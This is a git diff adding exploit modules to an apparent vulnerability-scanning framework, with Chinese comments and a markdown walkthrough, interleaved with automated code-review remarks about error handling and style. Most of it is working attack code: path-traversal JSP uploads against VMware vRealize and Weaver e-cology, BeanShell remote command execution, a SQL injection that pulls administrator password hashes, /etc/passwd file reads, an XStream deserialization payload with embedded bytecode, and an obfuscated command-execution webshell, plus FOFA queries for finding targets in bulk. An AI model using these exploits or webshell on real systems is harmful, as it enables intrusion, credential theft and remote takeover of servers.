/dev/null +++ b/Moudle/VRealize/CVE_2021_21983.py 
@@ -0,0 +1,55 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import io +from Config.config_requests import ua +import requests.packages.urllib3 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21983' +AUTHOR="境心" +REMARK='VMware vRealize 认证后任意文件上传漏洞' +FOFA_RULE='app="vmware-vRealize-Operations-Manager"' +###################################################### + +def poc_content(filename1): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB\r\nContent-Disposition: form-data; name="name"\r\n\r\n../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/{0}\r\n------WebKitFormBoundarypyfBh1YB4pV8McGB\r\nContent-Disposition: form-data; name="file"; filename=""\r\nContent-Type: image/jpeg\r\n\r\n<%@ page contentType="text/html;charset=UTF-8" language="java" %>\r\n<% out.print("this is a friendly test, Please check and repair upload vulnerabilities.");\r\n%>\r\n------WebKitFormBoundarypyfBh1YB4pV8McGB--""".format(filename1) + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def poc(target,exp=None): + if exp: + result = {} + url = target + "/casa/private/config/slice/ha/certificate" + headers = { + "User-Agent" : ua, + "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB", + "Authorization" : "Basic %s" % exp + } + filename1 = "abctestabc.jsp" + mem_string = poc_content(filename1) + res = requests.post(url, headers=headers, data=mem_string.read(), verify=False, timeout=5) + if res.status_code == 200: + poc_url = target + "/casa/%s" %filename1 + poc_res = requests.get(poc_url, headers=headers, verify=False, timeout=5) + if "this is a friendly test, Please check and repair upload vulnerabilities." 
in poc_res.text: + # if poc_res.status_code == 200: # exp的时候作为判断使用,注释掉上面一句判断,并取消这个注释 + result['poc'] = NAME + result['poc_url'] = poc_url + result['message'] = "存在%s" % REMARK + # print(result) + return result + else: + return "认证信息为空,请先获取并传入认证信息" + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1/","YWRtaW46QWRtaW5AMTIz") \ No newline at end of file diff --git a/Moudle/VRealize/images/1.png b/Moudle/VRealize/images/1.png new file mode 100644 index 0000000..976767d Binary files /dev/null and b/Moudle/VRealize/images/1.png differ diff --git a/Moudle/VRealize/images/10.png b/Moudle/VRealize/images/10.png new file mode 100644 index 0000000..975c8b4 Binary files /dev/null and b/Moudle/VRealize/images/10.png differ diff --git a/Moudle/VRealize/images/11.png b/Moudle/VRealize/images/11.png new file mode 100644 index 0000000..17c7e0f Binary files /dev/null and b/Moudle/VRealize/images/11.png differ diff --git a/Moudle/VRealize/images/2.png b/Moudle/VRealize/images/2.png new file mode 100644 index 0000000..887b057 Binary files /dev/null and b/Moudle/VRealize/images/2.png differ diff --git a/Moudle/VRealize/images/21.png b/Moudle/VRealize/images/21.png new file mode 100644 index 0000000..7217a38 Binary files /dev/null and b/Moudle/VRealize/images/21.png differ diff --git a/Moudle/VRealize/images/22.png b/Moudle/VRealize/images/22.png new file mode 100644 index 0000000..2dbb821 Binary files /dev/null and b/Moudle/VRealize/images/22.png differ diff --git a/Moudle/VRealize/images/23.png b/Moudle/VRealize/images/23.png new file mode 100644 index 0000000..5e981e4 Binary files /dev/null and b/Moudle/VRealize/images/23.png differ diff --git a/Moudle/VRealize/images/3.png b/Moudle/VRealize/images/3.png new file mode 100644 index 0000000..b7b1d0e Binary files /dev/null and b/Moudle/VRealize/images/3.png differ 
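Review bot: `poc` returns three different types — a dict on the success path, the string `"认证信息为空,请先获取并传入认证信息"` when `exp` is falsy, and an implicit `None` when the upload or the content check fails — so a caller doing `result['poc']` will blow up on the string case. Keep the message as output and make the return uniform: `print("认证信息为空,请先获取并传入认证信息"); return None`. `poc_content` wraps a plain `str` in `io.StringIO` only for the caller to `.read()` it straight back; returning the string directly is equivalent, and a docstring should note that the body is a hand-built multipart form whose fixed boundary must match the `Content-Type` header in `poc`. The `__main__` line hardcodes a base64 credential for `exp`; a placeholder such as `"<BASE64_USER_PASS>"` is preferable to committing a sample secret, and the docstring should say the value is sent in the `Authorization` header.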
diff --git a/Moudle/VRealize/images/4.png b/Moudle/VRealize/images/4.png new file mode 100644 index 0000000..02faef1 Binary files /dev/null and b/Moudle/VRealize/images/4.png differ diff --git a/Moudle/VRealize/images/5.png b/Moudle/VRealize/images/5.png new file mode 100644 index 0000000..b6c02fe Binary files /dev/null and b/Moudle/VRealize/images/5.png differ diff --git a/Moudle/VRealize/images/6.png b/Moudle/VRealize/images/6.png new file mode 100644 index 0000000..8d91d15 Binary files /dev/null and b/Moudle/VRealize/images/6.png differ diff --git a/Moudle/VRealize/images/7.png b/Moudle/VRealize/images/7.png new file mode 100644 index 0000000..791459e Binary files /dev/null and b/Moudle/VRealize/images/7.png differ diff --git a/Moudle/VRealize/images/8.png b/Moudle/VRealize/images/8.png new file mode 100644 index 0000000..445a1bd Binary files /dev/null and b/Moudle/VRealize/images/8.png differ diff --git a/Moudle/VRealize/images/9.png b/Moudle/VRealize/images/9.png new file mode 100644 index 0000000..0dc9036 Binary files /dev/null and b/Moudle/VRealize/images/9.png differ diff --git a/Moudle/Weaver/CNVD_2019_32204.py b/Moudle/Weaver/CNVD_2019_32204.py new file mode 100644 index 0000000..4263a53 --- /dev/null +++ b/Moudle/Weaver/CNVD_2019_32204.py 
@@ -0,0 +1,48 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +######################################################################################################################## +# 脚本信息 +NAME='CNVD_2019_32204' +AUTHOR="Faith" +REMARK='泛微OA Bsh 远程代码执行漏洞' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + +def poc(target): + result={} + payload1 = "/bsh.servlet.BshServlet" + payload2 = "/weaver/bsh.servlet.BshServlet" + payload3 = "/weaveroa/bsh.servlet.BshServlet" + payload4 = "/oa/bsh.servlet.BshServlet" + + data1 = '''bsh.script=exec("whoami");&bsh.servlet.output=raw''' + data2 = '''bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw''' + data3 = '''bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami''' + + for payload in (payload1,payload2,payload3,payload4): + url = target + payload + for data in (data1,data2,data3): + try: + r = requests.post(url,data=data,headers=headers,verify=False,timeout=3) + if r.status_code == 200: + if ";" not in r.content: + if "login.jsp" not in r.content: + if "Error" not in r.content: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py b/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py new file mode 100644 index 0000000..d293919 --- /dev/null +++ b/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py 
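Review bot: The bare `except: pass` inside the inner `for data in (...)` loop swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and also hides a programming error in the checks that follow (`r.content` is `bytes` in Python 3, so the `";" not in r.content` comparison raises `TypeError` instead of testing anything); narrow it to `except requests.RequestException: continue` so that kind of bug surfaces. The four nested `if` statements and the trailing `else: pass` (dead code) could be a single condition. `poc` has no docstring; it should document that it returns a dict on the first matching path and `None` otherwise, and that the result records only `target`, `poc` and `url`.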
@@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_OA_V8_sqlinjection' +AUTHOR="RabbitMask" +REMARK='泛微OA V8 SQL注入漏洞' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + + +def poc(target): + result={} + try: + url = target + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" + r = requests.get(url=url,headers=headers,verify=False,timeout=5) + if r.status_code == 200 and 'html' not in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + result["用户"] = 'sysadmin' + result["密码MD5"] = r.text.strip() + return result + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_Bridge_file_read.py b/Moudle/Weaver/Weaver_e_Bridge_file_read.py new file mode 100644 index 0000000..757389b --- /dev/null +++ b/Moudle/Weaver/Weaver_e_Bridge_file_read.py 
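Review bot: The entire body of `poc` sits inside a bare `except: pass`, so any failure — network error, `KeyboardInterrupt`, or a `KeyError` from `headers` — is silently dropped and the function returns `None` with no trace; keep the `try` around the `requests.get` call only and use `except requests.RequestException:`. The success test `'html' not in r.text` also accepts any error page that happens not to contain that substring, and `result["密码MD5"] = r.text.strip()` stores the raw response body, so the docstring should mark that field as unverified. The result keys `"用户"` and `"密码MD5"` differ from the ASCII keys (`target`, `poc`, `url`) used by the sibling modules in this commit; consistent keys make the framework's result handling simpler.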
@@ -0,0 +1,47 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_e_Bridge_file_read' +AUTHOR="Faith" +REMARK='泛微云桥 e-Bridge 任意文件读取' +FOFA_RULE='title="泛微云桥e-Bridge"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt" + url1 = target + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" + + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=url,headers=headers,verify=False,timeout=5) + r1 = requests.get(url1=url1,headers=headers,verify=False,timeout=5) + if r.status_code == 200 and "无法验证您的身份" not in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + result["system"] = "windows" + return result + else: + pass + if r1.status_code == 200 and "无法验证您的身份" not in r1.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url1 + result["system"] = "linux" + return result + else: + pass + + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_Cology_RCE.py b/Moudle/Weaver/Weaver_e_Cology_RCE.py new file mode 100644 index 0000000..1ef81f6 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_Cology_RCE.py 
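Review bot: The second request is spelled `requests.get(url1=url1, ...)`; `url1` is not a `requests` keyword, so the line raises `TypeError` on every call and the bare `except: pass` turns it into a silent `None` — because the exception fires before the first `if`, neither branch can ever be reached. Narrow the handler to `except requests.RequestException:` so programming errors like this surface instead of being absorbed. `disable_warnings` is called on every invocation inside the `try`, whereas the sibling modules call it once at import time. Both `else: pass` branches are dead, and `poc` needs a docstring stating that it returns at most one of the two results and `None` otherwise.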
@@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_e_Cology_RCE' +AUTHOR="Faith" +REMARK='泛微E-Cology WorkflowServiceXml RCE' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/services%20/WorkflowServiceXml" + cmd = "net user" + headers = { + 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)', + 'SOAPAction': '""', + 'Cmd': cmd, + "Content-Type": "text/xml;charset=UTF-8" + } + data = ''' + + + + + + + + <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class='javafx.collections.ObservableList$1'/> </default> <int>3</int> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <dataHandler> <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> <contentType>text/plain</contentType> <is class='java.io.SequenceInputStream'> <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'> <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'> <names class='java.util.AbstractList$Itr'> <cursor>0</cursor> <lastRet>-1</lastRet> <expectedModCount>0</expectedModCount> <outer-class class='java.util.Arrays$ArrayList'> <a class='string-array'> 
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85V$5bW$TW$U$fe$86$q$cc0$M$82A$84$a8$bd$d8V$N$u$89$d6$de$M$d6$8a$5c$ea$r$a05$U$x$da$ea0$ia$q$99$89$93$JP$7b$b1$ad$bd$df$ef$ad$bd$bc$f8$e2S$l$5c$ab$xj$5b$bb$da$3e$f6Gi$bf3$J$94$90$a8$ac$c5$999$fb$7c$fb$f6$ed$bdO$e6$df$5b$bf$fd$J$e01$fc$ac$a3$J$87t$a41$o$97Q$N$87u$i$c1s$g$8e$aa$c8$e8P1$a6$e2y$j$e38$s$91$_H$c9q$N$T$f2yB$c7I$bc$u$97$974$9cRqZ$83$a9$p$8aI$N$96$8a$v$N$v$VB$c7$ZL$cbeF$87$8d$b3$3a$ba0$ab$n$x$9f9$b98rq5$e4U$9c$d3$f1$Q$3c$V$F$F$8d$bbm$c7$f6$f7$u$I$c5$bb$c7$V$84$H$dc$v$a1$a05m$3bb$b4$98$9b$U$de$989$99$a5$q$9av$z3$3bnz$b6$dcW$84a$7f$c6$a6$8d$e6$f4$be$81$a1trh$ce$ce$f6$v$d0v$5b$d9$8a$cd$a8o$e5$L$ae5$x$7c$da$9b$j$c8$9a$e7$cf$xX$9d$3ek$ce$99$c9$ac$e9L$t$v$w$U$a8$T$9d$W$fe$40$d1$f3$84$e3$l$V$e7$8a$a2$e0$8f$uX$b7$M$e8$893Ya$f9$c9$R$e1$cf$b8S$d4XeU$c1e$80$ff$a3$PO$9e$r$98$u$e5$8c$82X$j3$c3$b6$c8J$x$9a$t$Ky$d7$v0$X$9d$n$i$f3l_xt$ad$cc$xh$x$eb$d9n$b2$y$ee$xc$f6$Ls$w$c0$84$ac$dcT$b5$db$8c$ef$d9$ce$b4tKR$da$cb$HE$df$ce$s3$96$e98$81$85$c8$9c$e9$ed$d8$a1$a0c$99$da$d0$82$r$f2$be$ed$3a$3co$c9$f8$a65$3bb$e6$D$86$d9$Y$w$7c$b6$85$8a$o$ab$ceR$b3$ce$y$l$p$c9$b8E$cf$S$c3$b6$yC$93d$3e$n$N$g$d8$84$cd$w$e6$M$ccc$c1$c0$cb$m$df$5b$y7$97$b0$cc$a25$e3$s$i$e1$cf$bb$del$ok$X$7c$e1$q$c6$ac$7cf$a9$3c$w$5e1$f0$w$5ec$85j$aa$c1$8eXQ4$D$af$e3$CIZI$3a$e35$f0$G$de4$f0$W$$$gx$h$X$a9$7bj$91$e6a$d3$o$7b$G$de$c1$bbL$c9$c0$7bx$df$c0$H$f8$909$y$d1$cf$daV$T$cf2$8d$X$b3c$MC7$f0$R$3e$$$83$cbu$a8$8a$a0$cc$3f$e3$afa$5e$c5$t$G$3e$c5g$G$3e$c7$X$w$be4$f0$V$be$96d$7d$a3$a0$e1d$bf$81o$f1$9d$81$efq$c9$c0$P$f8Q$BX$bf$3a$F2$f0$T6$d3$fdR$bb$x$e8$baS$8f$w$e8$bcC$dfU$c5$3c6$e31$R$W$be$d2$cf$8b$fb5$f1$ee$f4J$U$fb$a3C$96$c6u$7c$b1$e0$HeH$bbe$WbU$f0eGR$a7$ee$B$d3$c8$f2$r$90$u$d8$U$af$ed$e3$g$8b$7de$e6$X$f3$db$5bG$e7D$8dN$f7$dd$a6$b8$d1v$e6$dcY$b6$f0$aex$ed$f8$9e$a8$Vu$d7$hrMrRN$a3$bd$96$G9T$Ed$8ay$e1YeT$h$f7$83$82$hOLU$w$d2$7b$8f$fcW$5e$i$z$F$e1$f7$5b$96$u$U$ec$f2M$Y$9f$90$d7g$88$96$Vl$ae$93L$dd$c8$p$f3$b2$c1Y$a1z$de$c7$X$h9$90$k$z$3a$be$9d$ab$dcSK$9b$8e$aa$7c$xb$g$O$8b$Faq$f4$ef$91$d
5$R$cf$95$v$f4Uy$aa$I9$86$f4t$c0$c9$X$7dj$K3$c7$86$5e$f4$c6$d1$5cv$40$f5$aex$dd$D$99$83Q$y$88A$91$b5s$e5Q$beKH$x$aeJu$c6$y$8c$b2$cf$83$9f$a6$J$e6$e4$E$9b$ea$c1X$bar$5b$f3$7c$f1$83$dbs$cc3$z$81$8dx$84$3f$a3$f2$af$81$d3$cck$91$eb$W$ee$92$7cr$c0$R$e9$b9$G$e5jp$i$e7$da$Y$I$9b$d0$cd$d5$u$D$d0$83$ad$7cj$d8$b6$a8$ac$dc$oN$a7$ec$9f$ebh$u$n$U$N$97$Q9$d4$Tm$M$dd$84Z$82$96$de$aa$f0$ad$a9$E$7dd$5b$J$cd$r$Y$d1$96$SV$8d$f6$S$d7$daKQ$5b$w$i$e3$7bstuE$p$V$89Eb$e1$8a$d2_$88$a6$gc$8d$d1$f6$S$d6H$fdhG$98$a8$e3$a1$e8$da$8c$84$aa1u$h$FM$Utf$C$f8$da$94$f6$3b$ba$8e_G$y$a6$95$b0$ae$84$f5$d7$b0$nz_$J$f7$a7$9ab$8d1$da$7c$e0$S$9a$e5$f3$c1$x$88D7$d2$ee$Vh$87zJx$f8j$90$e3$N$fc$c1$_$81P$c0$c00V$H$b9$hhA$tV$91$c0V$q$d0$86$9d$94$a7$f8$b1q$Q$ed$98$c0$g$98$e8$40$Rkymw$e22$3f$vn$60$3d$ad$c4p$T$eb$f076$E$M$e6$d1L$3b$bf$a0$97$W$Q$e0$92$d8N$8f$hy$c7$ee$c0$a3$e4$3c$c1$9b$7c$t$3f$8bB$b4$7d$B$8fS$W$a6$H$XO$Q$X$a1$9fSx$SO$91$ed$o$G$b1$8b2$95$fe$b6$T$db$c7z$5c$a6$c5$ddx$9a$d5$baI$ad$3dx$86$3e$f6$f2$ff4$c2$b7$f1$xt$V$fd$w$f6$a9$YP1$Y$ac$7c$l$K$d6a$V$cfB$e1$ee6$83$b9$X$ae$n$d8$N$dff$3c$90J$fb$c3T$3a$Qt$cc$c1$ff$A$T$b5l$7e$d7$J$A$A </string> </a> </outer-class> </names> <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'> <parent class='sun.misc.Launcher$ExtClassLoader'> </parent> <package2certs class='hashtable'/> <classes defined-in='java.lang.ClassLoader'/> <defaultDomain> <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/> <principals/> <hasAllPerm>false</hasAllPerm> <staticPermissions>false</staticPermissions> <key> </key> </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom"> <java.util.Collections_-SynchronizedCollection> <default> <c class="set"></c> <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/> </default> </java.util.Collections_-SynchronizedCollection> </domains> <packages/> <nativeLibraries/> <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' 
reference='..'/> <defaultAssertionStatus>false</defaultAssertionStatus> <classes/> <ignored__packages> <string>java.</string> <string>javax.</string> <string>sun.</string> </ignored__packages> <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'> <__path> <paths/> <class__path>.</class__path> </__path> <__loadedClasses/> </repository> <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/> </processorCL> </iterator> <type>KEYS</type> </e> <in class='java.io.ByteArrayInputStream'> <buf></buf> <pos>0</pos> <mark>0</mark> <count>0</count> </in> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/> </java.util.PriorityQueue> </java.util.PriorityQueue> + 2 + + + '''.format(cmd=cmd) + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url,headers=headers,data=data,verify=False,timeout=5) + if "VulTest" in r.text and r.status_code == 500: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass +if __name__ == '__main__': + target = sys.argv[1] + poc(target) \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md new file mode 100644 index 0000000..762d863 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.md 
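Review bot: The `__main__` block reads `sys.argv[1]` with no guard, so running the module without an argument dies with an `IndexError` instead of a usage message; `if len(sys.argv) != 2: sys.exit("usage: Weaver_e_Cology_RCE.py <target>")` would do. Inside `poc`, the `data` template is passed through `.format(cmd=cmd)` although no `{cmd}` placeholder is visible in the body (the command travels in the `Cmd` header instead), so the call is either a no-op or, if the serialized payload ever contains a literal brace, a `KeyError`/`ValueError` — either drop it or add a comment saying why it is kept. The bare `except: pass` and dead `else: pass` repeat the pattern noted on CNVD_2019_32204.py. The success check `"VulTest" in r.text and r.status_code == 500` deserves a comment explaining where that marker comes from, since it does not appear in plain text anywhere in the hunk.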
@@ -0,0 +1,94 @@ +# 1、漏洞描述 + + + +泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,可在前台直接getshell,漏洞危害很大,见到路过不要错过。 + +使用fofa可搜索泛微OA相关的系统,不过不一定是存在漏洞的系统,需要尝试; + +``` +app="泛微-协同办公OA" +``` + +# 2、影响范围 + +泛微e-cology v9 + +# 3、漏洞验证 + +## 3.1、漏洞URL + +此漏洞的深度成因暂未做研究,个人理解的是,此处存在上传功能,并且上传压缩包后,会自动解压,而此处文件名包含三层目录结构,则是为了将被压缩文件解压到可访问执行的目录中; + +漏洞的URL如下(重点是URI部分) + +``` +http://x.x.x.x:port/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp +``` + +若页面返回状态码为200,则可能存在漏洞; + +![](images/1.png) + +若页面返回状态码404,则不存在漏洞; + +## 3.2、漏洞验证/利用 + +可使用成型的POC脚本批量验证/利用,也可手动单个验证; + +### 3.2.1、手动验证 + +1. 用本地任意一个上传程序,burpsuit对上传文件的过程抓包; +2. 修改URI、HOST、 POST表单中的name名称(改成file1)、POST表单中的Content-Type(改成图中的格式)、burpsuit中的Target,注意最好删除本地上传抓包内容中存在个人IP的head信息,如origin、refer等; + +![](images/2.jpg) + +1. 按如上步骤修改完成后,发送请求,若页面返回200,然后访问被上传文件的URL,http://x.x.x.x:port/cloudstore/welcome.txt,页面返回文件内容即是存在漏洞。 + + + +POST包(==只用作参考,方便复制一些要修改的地方,还需自己本地抓上传包,因压缩包文件传输存在无法识别的内容,无法直接复制==): + +``` +POST +/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1 +Host: x.x.x.x:8001 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------97014110427240678953456189835 +Content-Length: 536 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------97014110427240678953456189835 +Content-Disposition: form-data; name="file1"; filename="welcome.zip" +Content-Type: application/zip + +PK +-----------------------------97014110427240678953456189835 +Content-Disposition: form-data; name="submit" + +ä¸Šä¼ +-----------------------------97014110427240678953456189835-- +``` + +**注意:** + +- 上传的文件必须是个zip压缩文件; + +- 
被压缩的文件名要有../../../的三层目录结构,比如../../../test.txt,因Windows文件名不能有/,可先压缩文件,然后用7z解压缩软件打开该压缩包,重命名被压缩的文件,添加上三层目录结构的命名; + +- 不少站是能上传上去,但是访问存在的文件时,会跳转到登陆页面,也就是说只能传,但不能利用; +![](images/3.png) + + +### 3.2.2、脚本EXP验证/利用 + +poc与exp结合,建议先poc验证,结合框架,poc可批量,同时打印poc的url,方便验证; + +exp上传的是个能执行命令的webshell,打印webshell地址,可直接执行命令。 + +![](images/4.png) \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py new file mode 100644 index 0000000..4d2a211 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_cology_v9_file_upload.py 
@@ -0,0 +1,94 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import zipfile +import io +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='Weaver_e_cology_v9_file_upload' +AUTHOR="境心" +REMARK='泛微OA weaver.common.Ctrl 任意文件上传漏洞' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_zip(): + poc_name = '../../../test.jsp' + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%>""" + mem_string = io.BytesIO() + zfile = zipfile.ZipFile(mem_string, 'w', zipfile.ZIP_DEFLATED, allowZip64=False) + zfile.writestr(poc_name, content) + zfile.close() + mem_string.seek(0) + return mem_string + +def exp_zip(): + exp_name = '../../../test1.jsp' + content = """<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<%@ page import="sun.misc.BASE64Decoder" %> +<% + if(request.getParameter("cmd")!=null){ + BASE64Decoder decoder = new BASE64Decoder(); + Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU="))); + Process e = (Process) + rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new + String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new + Object[]{}), request.getParameter("cmd") ); + java.io.InputStream in = e.getInputStream(); + int a = -1; + byte[] b = new byte[2048]; + out.print("
");
+        while((a=in.read(b))!=-1){
+            out.println(new String(b));
+        }
+        out.print("
"); + } +%> +""" + mem_string = io.BytesIO() + zfile = zipfile.ZipFile(mem_string, 'w', zipfile.ZIP_DEFLATED, allowZip64=False) + zfile.writestr(exp_name, content) + zfile.close() + mem_string.seek(0) + return mem_string + +def poc(target,exp=None): + result = {} + target_url = target + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp' + if exp == None: + mem_string = poc_zip() + GetShellurl = target + '/cloudstore/test.jsp' + elif exp == "exp": + mem_string = exp_zip() + GetShellurl = target + '/cloudstore/test1.jsp' + file = [('file1', ('test.zip', mem_string.read(), 'application/zip'))] + requests.post(url=target_url,files=file,timeout=5, verify=False) + shell_res = requests.get(url = GetShellurl) + GetShell_res = shell_res.text + GetShell_res_code = shell_res.status_code + if exp == "exp" and GetShell_res_code == 200: + print("webshell地址为: "+GetShellurl) + elif GetShell_res_code == 200 and "this is a friendly test" in GetShell_res: + result['poc_url'] = GetShellurl + result['message'] = "存在任意文件上传漏洞" + result['poc'] = NAME + return result + # print('利用成功webshell地址为:'+GetShellurl) + elif GetShell_res_code == 200 and "this is a friendly test" not in GetShell_res: + result['poc_url'] = GetShellurl + result['message'] = "存在上传漏洞但无法访问文件" + result['poc'] = NAME + return result + +if __name__ == '__main__': + # poc + poc("http://127.0.0.1") + # exp 传的是个能命令执行的webshell,POST传参cmd=命令 + # poc("http://127.0.0.1", "exp") \ No newline at end of file diff --git a/Moudle/Weaver/images/1.png b/Moudle/Weaver/images/1.png new file mode 100644 index 0000000..cf15f6b Binary files /dev/null and b/Moudle/Weaver/images/1.png differ diff --git a/Moudle/Weaver/images/2.jpg b/Moudle/Weaver/images/2.jpg new file mode 100644 index 0000000..0dbc23e Binary files /dev/null and b/Moudle/Weaver/images/2.jpg differ 
diff --git a/Moudle/Weaver/images/3.png b/Moudle/Weaver/images/3.png new file mode 100644 index 0000000..963f7ee Binary files /dev/null and b/Moudle/Weaver/images/3.png differ diff --git a/Moudle/Weaver/images/4.png b/Moudle/Weaver/images/4.png new file mode 100644 index 0000000..6d05160 Binary files /dev/null and b/Moudle/Weaver/images/4.png differ diff --git a/Moudle/Weblogic/CVE_2014_4210.py b/Moudle/Weblogic/CVE_2014_4210.py new file mode 100644 index 0000000..6dfaf68 --- /dev/null +++ b/Moudle/Weblogic/CVE_2014_4210.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua + + +# 脚本信息 +###################################################### +NAME='CVE_2014_4210' +AUTHOR="Faith" +REMARK='Weblogic SSRF漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url = target + "/uddiexplorer/SearchPublicRegistries.jsp" + headers = {"User-Agent":ua} + r = requests.get(vuln_url, headers=headers,verify=False,timeout=3) + try: + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Weblogic/CVE_2017_10271.py b/Moudle/Weblogic/CVE_2017_10271.py new file mode 100644 index 0000000..2600f3d --- /dev/null +++ b/Moudle/Weblogic/CVE_2017_10271.py 
